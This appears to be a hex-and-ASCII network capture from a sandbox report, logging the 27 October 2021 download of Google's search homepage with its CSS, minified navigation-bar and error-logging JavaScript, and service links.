                                                                    Data Ascii: or-stop(0,rgba(0,0,0,.1)),color-stop(.5,rgba(0,0,0,.8)),color-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0
                                                                    2021-10-27 14:29:02 UTC19INData Raw: 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30
                                                                    Data Ascii: margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 63 62 0d 0a 21 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6e 2b 2b 3b 65 3d 65 7c 7c 7b 7d 3b 62 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3b 76 61 72 20 63 3d 22 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 65 69 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 49 29 3b 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 26 26 28 63 2b 3d 22 26 6a 65 78 70 69 64 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 29 29 3b 63 2b 3d 22 26 73 72 63 70 67 3d 22 2b 62 28 71 2e 73 70 29 2b 22 26 6a 73 72 3d 22 2b 62 28 71 2e 6a 73 72 29 2b 22 26 62 76 65 72 3d 22 2b 62 28 71 2e 62 76 29 2b 28 22 26 6a 73 65 6c 3d 22 2b 64 29 0d 0a
                                                                    Data Ascii: cb!b)return null;n++;e=e||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(q.sp)+"&jsr="+b(q.jsr)+"&bver="+b(q.bv)+("&jsel="+d)
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 37 31 65 66 0d 0a 3b 63 2b 3d 22 26 73 6e 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 73 6e 29 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 63 2b 3d 22 26 22 2c 63 2b 3d 62 28 72 29 2c 63 2b 3d 22 3d 22 2c 63 2b 3d 62 28 65 5b 72 5d 29 3b 63 3d 63 2b 22 26 65 6d 73 67 3d 22 2b 62 28 61 2e 6e 61 6d 65 2b 22 3a 20 22 2b 61 2e 6d 65 73 73 61 67 65 29 3b 63 3d 63 2b 22 26 6a 73 73 74 3d 22 2b 62 28 61 2e 73 74 61 63 6b 7c 7c 22 4e 2f 41 22 29 3b 31 32 32 38 38 3c 3d 63 2e 6c 65 6e 67 74 68 26 26 28 63 3d 63 2e 73 75 62 73 74 72 28 30 2c 31 32 32 38 38 29 29 3b 61 3d 63 3b 6d 7c 7c 67 6f 6f 67 6c 65 2e 6c 6f 67 28 30 2c 22 22 2c 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 65 2c 6d 2c 64
                                                                    Data Ascii: 71ef;c+="&sn="+b(google.sn);for(var r in e)c+="&",c+=b(r),c+="=",c+=b(e[r]);c=c+"&emsg="+b(a.name+": "+a.message);c=c+"&jsst="+b(a.stack||"N/A");12288<=c.length&&(c=c.substr(0,12288));a=c;m||google.log(0,"",a);return a};window.onerror=function(a,b,e,m,d
                                                                    2021-10-27 14:29:02 UTC21INData Raw: 63 74 69 6f 6e 28 29 7b 7d 2c 68 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 65 77 20 49 6d 61 67 65 2c 63 3d 69 61 3b 62 2e 6f 6e 65 72 72 6f 72 3d 62 2e 6f 6e 6c 6f 61 64 3d 62 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 65 6c 65 74 65 20 6a 61 5b 63 5d 7d 63 61 74 63 68 28 64 29 7b 7d 7d 3b 6a 61 5b 63 5d 3d 62 3b 62 2e 73 72 63 3d 61 3b 69 61 3d 63 2b 31 7d 2c 6a 61 3d 5b 5d 2c 69 61 3d 30 3b 70 28 22 6c 6f 67 67 65 72 22 2c 7b 69 6c 3a 68 61 2c 6d 6c 3a 74 2c 6c 6f 67 3a 6b 61 7d 29 3b 76 61 72 20 75 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 3b 76 61 72 20 76 3d 7b 7d 2c 6c 61 3d 7b 7d 2c 77 3d 5b 5d 2c 6d 61 3d 68 2e 62 28 22 30 2e 31 22
                                                                    Data Ascii: ction(){},ha=function(){},ka=function(a){var b=new Image,c=ia;b.onerror=b.onload=b.onabort=function(){try{delete ja[c]}catch(d){}};ja[c]=b;b.src=a;ia=c+1},ja=[],ia=0;p("logger",{il:ha,ml:t,log:ka});var u=window.gbar.logger;var v={},la={},w=[],ma=h.b("0.1"
                                                                    2021-10-27 14:29:02 UTC22INData Raw: 63 57 66 58 51 57 4b 64 54 70 51 2f 6d 3d 5f 5f 66 65 61 74 75 72 65 73 5f 5f 22 29 29 7b 76 61 72 20 46 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 77 61 3f 61 7c 7c 62 3a 62 7d 2c 78 61 3d 68 2e 61 28 22 31 22 29 2c 79 61 3d 68 2e 61 28 22 22 29 2c 7a 61 3d 68 2e 61 28 22 22 29 2c 77 61 3d 68 2e 61 28 22 22 29 2c 41 61 3d 77 69 6e 64 6f 77 2e 67 61 70 69 3d 46 28 77 69 6e 64 6f 77 2e 67 61 70 69 2c 7b 7d 29 2c 42 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 64 67 6c 28 61 2c 62 29 7d 3b 78 61 3f 42 28 63 29 3a 28 41 28 22 67 6c 22 2c 63 29 2c 44 28 22 67 6c 22 29 29 7d 2c 43 61 3d 7b 7d 2c 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 3a 22
                                                                    Data Ascii: cWfXQWKdTpQ/m=__features__")){var F=function(a,b){return wa?a||b:b},xa=h.a("1"),ya=h.a(""),za=h.a(""),wa=h.a(""),Aa=window.gapi=F(window.gapi,{}),Ba=function(a,b){var c=function(){g.dgl(a,b)};xa?B(c):(A("gl",c),D("gl"))},Ca={},Da=function(a){a=a.split(":"
                                                                    2021-10-27 14:29:02 UTC24INData Raw: 67 63 3d 22 2c 64 28 22 47 42 52 22 29 2c 22 26 6f 67 6c 3d 22 2c 64 28 22 65 6e 22 29 5d 3b 62 2e 5f 73 6e 26 26 28 62 2e 5f 73 6e 3d 0a 22 6f 67 2e 22 2b 62 2e 5f 73 6e 29 3b 66 6f 72 28 76 61 72 20 6b 20 69 6e 20 62 29 66 2e 70 75 73 68 28 22 26 22 29 2c 66 2e 70 75 73 68 28 64 28 6b 29 29 2c 66 2e 70 75 73 68 28 22 3d 22 29 2c 66 2e 70 75 73 68 28 64 28 62 5b 6b 5d 29 29 3b 66 2e 70 75 73 68 28 22 26 65 6d 73 67 3d 22 29 3b 66 2e 70 75 73 68 28 64 28 63 2e 6e 61 6d 65 2b 22 3a 22 2b 63 2e 6d 65 73 73 61 67 65 29 29 3b 76 61 72 20 6d 3d 66 2e 6a 6f 69 6e 28 22 22 29 3b 48 61 28 6d 29 26 26 28 6d 3d 6d 2e 73 75 62 73 74 72 28 30 2c 32 45 33 29 29 3b 76 61 72 20 6e 3d 6d 3b 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 2e 5f 61
                                                                    Data Ascii: gc=",d("GBR"),"&ogl=",d("en")];b._sn&&(b._sn="og."+b._sn);for(var k in b)f.push("&"),f.push(d(k)),f.push("="),f.push(d(b[k]));f.push("&emsg=");f.push(d(c.name+":"+c.message));var m=f.join("");Ha(m)&&(m=m.substr(0,2E3));var n=m;var l=window.gbar.logger._a
                                                                    2021-10-27 14:29:02 UTC25INData Raw: 2e 6d 61 74 63 68 28 2f 2e 2a 5c 2f 61 63 63 6f 75 6e 74 73 5c 2f 43 6c 65 61 72 53 49 44 5b 3f 5d 2f 29 26 26 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 50 61 28 29 29 3b 62 26 26 28 61 2e 68 72 65 66 3d 61 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 28 5b 3f 26 5d 63 6f 6e 74 69 6e 75 65 3d 29 5b 5e 26 5d 2a 2f 2c 22 24 31 22 2b 62 29 29 7d 66 75 6e 63 74 69 6f 6e 20 53 61 28 61 29 7b 77 69 6e 64 6f 77 2e 67 41 70 70 6c 69 63 61 74 69 6f 6e 26 26 28 61 2e 68 72 65 66 3d 77 69 6e 64 6f 77 2e 67 41 70 70 6c 69 63 61 74 69 6f 6e 2e 67 65 74 54 61 62 55 72 6c 28 61 2e 68 72 65 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 54 61 28 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 28 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 71 7c 7c 22 22 29 2e 76
                                                                    Data Ascii: .match(/.*\/accounts\/ClearSID[?]/)&&encodeURIComponent(Pa());b&&(a.href=a.href.replace(/([?&]continue=)[^&]*/,"$1"+b))}function Sa(a){window.gApplication&&(a.href=window.gApplication.getTabUrl(a.href))}function Ta(a){try{var b=(document.forms[0].q||"").v
                                                                    2021-10-27 14:29:02 UTC26INData Raw: 64 65 66 61 75 6c 74 56 69 65 77 3b 63 26 26 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3f 28 61 3d 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 61 2c 22 22 29 29 26 26 28 62 3d 61 2e 64 69 72 65 63 74 69 6f 6e 29 3a 62 3d 61 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3f 0a 61 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 2e 64 69 72 65 63 74 69 6f 6e 3a 61 2e 73 74 79 6c 65 2e 64 69 72 65 63 74 69 6f 6e 3b 72 65 74 75 72 6e 22 72 74 6c 22 3d 3d 62 7d 2c 66 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 29 74 72 79 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 64 35 22 29 3b 69 66 28 64 29 7b 76 61 72 20 66 3d 64 2e 66 69 72 73 74 43 68 69 6c 64 2c 6b 3d 66 2e 66 69 72
                                                                    Data Ascii: defaultView;c&&c.getComputedStyle?(a=c.getComputedStyle(a,""))&&(b=a.direction):b=a.currentStyle?a.currentStyle.direction:a.style.direction;return"rtl"==b},fb=function(a,b,c){if(a)try{var d=document.getElementById("gbd5");if(d){var f=d.firstChild,k=f.fir
                                                                    2021-10-27 14:29:02 UTC27INData Raw: 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 61 61 26 26 67 2e 70 61 61 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7d 29 7d 2c 6c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4c 5b 61 5d 7c 7c 28 4c 5b 61 5d 3d 5b 5d 29 3b 4c 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6d 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4d 5b 61 5d 7c 7c 28 4d 5b 61 5d 3d 5b 5d 29 3b 4d 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6e 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 58 61 5b 61 5d 3d 62 7d 2c 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4e 5b 61 5d 7c 7c 28 4e 5b 61 5d 3d 5b 5d 29 3b 4e 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 61 62 3d 66 75
                                                                    Data Ascii: kb=function(a,b,c,d,f,k,m,n,l,q){B(function(){g.paa&&g.paa(a,b,c,d,f,k,m,n,l,q)})},lb=function(a,b){L[a]||(L[a]=[]);L[a].push(b)},mb=function(a,b){M[a]||(M[a]=[]);M[a].push(b)},nb=function(a,b){Xa[a]=b},ob=function(a,b){N[a]||(N[a]=[]);N[a].push(b)},ab=fu
                                                                    2021-10-27 14:29:02 UTC29INData Raw: 4f 7d 3b 70 28 22 73 6f 22 2c 56 61 29 3b 70 28 22 73 6f 73 22 2c 55 61 29 3b 70 28 22 73 69 22 2c 57 61 29 3b 70 28 22 74 67 22 2c 62 62 29 3b 0a 70 28 22 63 6c 6f 73 65 22 2c 63 62 29 3b 70 28 22 72 64 64 22 2c 64 62 29 3b 70 28 22 61 64 64 4c 69 6e 6b 22 2c 67 62 29 3b 70 28 22 61 64 64 45 78 74 72 61 4c 69 6e 6b 22 2c 68 62 29 3b 70 28 22 70 63 6d 22 2c 69 62 29 3b 70 28 22 70 63 61 22 2c 6a 62 29 3b 70 28 22 70 61 61 22 2c 6b 62 29 3b 70 28 22 64 64 6c 64 22 2c 24 61 29 3b 70 28 22 64 64 72 64 22 2c 73 62 29 3b 70 28 22 64 64 65 72 72 22 2c 72 62 29 3b 70 28 22 72 74 6c 22 2c 59 61 29 3b 70 28 22 6f 70 22 2c 76 62 29 3b 70 28 22 62 68 22 2c 4c 29 3b 70 28 22 61 62 68 22 2c 6c 62 29 3b 70 28 22 64 68 22 2c 4d 29 3b 70 28 22 61 64 68 22 2c 6d 62 29 3b
                                                                    Data Ascii: O};p("so",Va);p("sos",Ua);p("si",Wa);p("tg",bb);p("close",cb);p("rdd",db);p("addLink",gb);p("addExtraLink",hb);p("pcm",ib);p("pca",jb);p("paa",kb);p("ddld",$a);p("ddrd",sb);p("dderr",rb);p("rtl",Ya);p("op",vb);p("bh",L);p("abh",lb);p("dh",M);p("adh",mb);
                                                                    2021-10-27 14:29:02 UTC30INData Raw: 2c 62 29 7d 2c 48 62 3d 7b 73 69 67 6e 65 64 3a 45 62 2c 65 6c 6f 67 3a 47 62 2c 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 75 73 6f 6e 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 2f 30 22 2c 6c 6f 61 64 54 69 6d 65 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 76 2e 70 77 3d 48 62 3b 76 61 72 20 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 73 70 6c 69 74 28 22 2e 22 29 3b 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6d 3d 61 72 67 75 6d 65 6e 74 73 3b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 67 2c 6c 3d 30 2c 71 3d 63 2e 6c 65 6e 67 74 68 2d 31 3b 6c 3c 71 3b 2b 2b 6c 29 6e 3d 6e 5b 63 5b 6c 5d 5d 3b 6e 5b 63 5b 6c 5d 5d 2e 61 70 70 6c 79 28 6e 2c 6d 29 7d 29 7d 3b
                                                                    Data Ascii: ,b)},Hb={signed:Eb,elog:Gb,base:"https://plusone.google.com/u/0",loadTime:(new Date).getTime()};v.pw=Hb;var Ib=function(a,b){var c=b.split(".");b=function(){var m=arguments;a(function(){for(var n=g,l=0,q=c.length-1;l<q;++l)n=n[c[l]];n[c[l]].apply(n,m)})};
                                                                    2021-10-27 14:29:02 UTC31INData Raw: 65 6e 67 74 68 26 26 66 2e 70 75 73 68 28 22 2c 22 29 2c 66 2e 70 75 73 68 28 51 62 28 7a 29 29 2c 66 2e 70 75 73 68 28 22 2e 22 29 2c 66 2e 70 75 73 68 28 51 62 28 62 5b 7a 5d 29 29 3b 76 61 72 20 7a 3d 66 2e 6a 6f 69 6e 28 22 22 29 3b 22 22 21 3d 7a 26 26 28 61 2e 70 75 73 68 28 22 26 6f 67 61 64 3d 22 29 2c 61 2e 70 75 73 68 28 64 28 7a 29 29 29 7d 6b 61 28 61 2e 6a 6f 69 6e 28 22 22 29 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 62 28 61 29 7b 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 61 2b 3d 22 22 29 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 3f 61 2e 72 65 70 6c 61 63 65 28 22 2e 22 2c 22 25 32 45 22 29 2e 72 65 70 6c 61 63 65 28 22 2c 22 2c 22 25 32 43 22 29 3a 61 7d 68 61 3d 50 62 3b 70 28 22 69
                                                                    Data Ascii: ength&&f.push(","),f.push(Qb(z)),f.push("."),f.push(Qb(b[z]));var z=f.join("");""!=z&&(a.push("&ogad="),a.push(d(z)))}ka(a.join(""))}}function Qb(a){"number"==typeof a&&(a+="");return"string"==typeof a?a.replace(".","%2E").replace(",","%2C"):a}ha=Pb;p("i
                                                                    2021-10-27 14:29:02 UTC33INData Raw: 30 3e 63 3f 4d 61 74 68 2e 6d 61 78 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 63 29 3a 63 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 63 20 69 6e 20 61 26 26 61 5b 63 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 20 63 3b 72 65 74 75 72 6e 2d 31 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 2d 31 3d 3d 63 63 28 61 2c 58 29 3f 28 72 28 45 72 72 6f 72 28 58 2b 22 5f 22 2b 62 29 2c 22 75 70 22 2c 22 63 61 61 22 29 2c 21 31 29 3a 21 30 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 59 28 5b 31 2c 32 5d 2c 22 72 22 29 26 26 28 53 5b 61 5d 3d 53 5b 61 5d 7c 7c 5b 5d 2c 53 5b 61 5d 2e 70 75 73 68 28 62 29 2c 32 3d 3d 58 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 28 64 63 28 61
                                                                    Data Ascii: 0>c?Math.max(0,a.length+c):c;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1},Y=function(a,b){return-1==cc(a,X)?(r(Error(X+"_"+b),"up","caa"),!1):!0},ec=function(a,b){Y([1,2],"r")&&(S[a]=S[a]||[],S[a].push(b),2==X&&window.setTimeout(function(){b(dc(a
                                                                    2021-10-27 14:29:02 UTC34INData Raw: 66 28 6a 63 28 29 29 72 65 74 75 72 6e 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 62 29 3b 69 66 28 6b 63 28 61 29 29 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 28 61 2e 69 64 29 2c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 29 7d 63 61 74 63 68 28 64 29 7b 64 2e 63 6f 64 65 21 3d 44 4f 4d 45 78 63 65 70 74 69 6f 6e 2e 51 55 4f 54 41 5f 45 58 43 45 45 44 45 44 5f 45 52 52 26 26 72 28 64 2c 22 75 70 22 2c 22 67 70 64 22 29 7d 72 65 74 75 72 6e 22 22 7d 2c 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 61 74 74 61 63 68 45 76 65 6e
                                                                    Data Ascii: f(jc())return e.localStorage.getItem(b);if(kc(a))return a.load(a.id),a.getAttribute(b)}catch(d){d.code!=DOMException.QUOTA_EXCEEDED_ERR&&r(d,"up","gpd")}return""},nc=function(a,b,c){a.addEventListener?a.addEventListener(b,c,!1):a.attachEvent&&a.attachEven
                                                                    2021-10-27 14:29:02 UTC35INData Raw: 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 62 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 74 72 79 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 6f 6d 22 29 3b 61 26 26 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 2e 63
                                                                    Data Ascii: er.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var b=window.gbar.i.i;var c=window.gbar;var f=function(d){try{var a=document.getElementById("gbom");a&&d.appendChild(a.c
                                                                    2021-10-27 14:29:02 UTC36INData Raw: 3b 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 63 2b 22 2f 73 65 61 72 63 68 5c 5c 3f 22 29 3b 28 62 3d 63 2e 74 65 73 74 28 62 29 29 26 26 21 2f 28 5e 7c 5c 5c 3f 7c 26 29 65 69 3d 2f 2e 74 65 73 74 28 61 2e 68 72 65 66 29 26 26 28 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 26 26 62 2e 6b 45 58 50 49 26 26 28 61 2e 68 72 65 66 2b 3d 22 26 65 69 3d 22 2b 62 2e 6b 45 49 29 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6d 28 61 29 3b 0a 6e 28 61 29 7d 2c 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 7b 76 61 72 20 61 3d 2f 2e 2a 68 70 24 2f 3b 72 65 74 75 72 6e 20 61 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 3f 22 22 3a
                                                                    Data Ascii: ;c=new RegExp("^"+c+"/search\\?");(b=c.test(b))&&!/(^|\\?|&)ei=/.test(a.href)&&(b=window.google)&&b.kEXPI&&(a.href+="&ei="+b.kEI)},p=function(a){m(a);n(a)},q=function(){if(window.google&&window.google.sn){var a=/.*hp$/;return a.test(window.google.sn)?"":
                                                                    2021-10-27 14:29:02 UTC38INData Raw: 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 6c 34 6f 70 51 4c 6a 77 6c 53 42 57 4e 63 4b 73 68 47 48 6d 51 3d 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 72 63 3d 27 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 27 3b 76 61 72 20 69 65 73 67 3d 66 61 6c 73 65 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6e 20 26 26 20 77 69 6e 64 6f 77 2e 6e 28 29 3b 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 69 6d 61 67 65 73 29 7b 6e 65 77 20 49 6d 61 67 65 28 29 2e 73 72 63 3d 73 72 63 3b 7d 0a 69 66 20 28 21 69 65 73 67 29 7b
                                                                    Data Ascii: )();</script></head><body bgcolor="#fff"><script nonce="ql4opQLjwlSBWNcKshGHmQ==">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}if (!iesg){
                                                                    2021-10-27 14:29:02 UTC39INData Raw: 64 3d 67 62 5f 34 32 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 77 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 4e 65 77 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 33 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6d 61 69 6c 2f 3f 74 61 62 3d 77 6d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 47 6d 61 69 6c 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                                    Data Ascii: d=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><
                                                                    2021-10-27 14:29:02 UTC40INData Raw: 6b 2f 73 68 6f 70 70 69 6e 67 3f 68 6c 3d 65 6e 26 73 6f 75 72 63 65 3d 6f 67 26 74 61 62 3d 77 66 22 3e 53 68 6f 70 70 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 33 30 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6a 22 3e 42 6c 6f 67 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 37 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 66 69 6e 61 6e 63 65 3f 74 61 62 3d 77 65 22 3e 46 69 6e 61 6e 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61
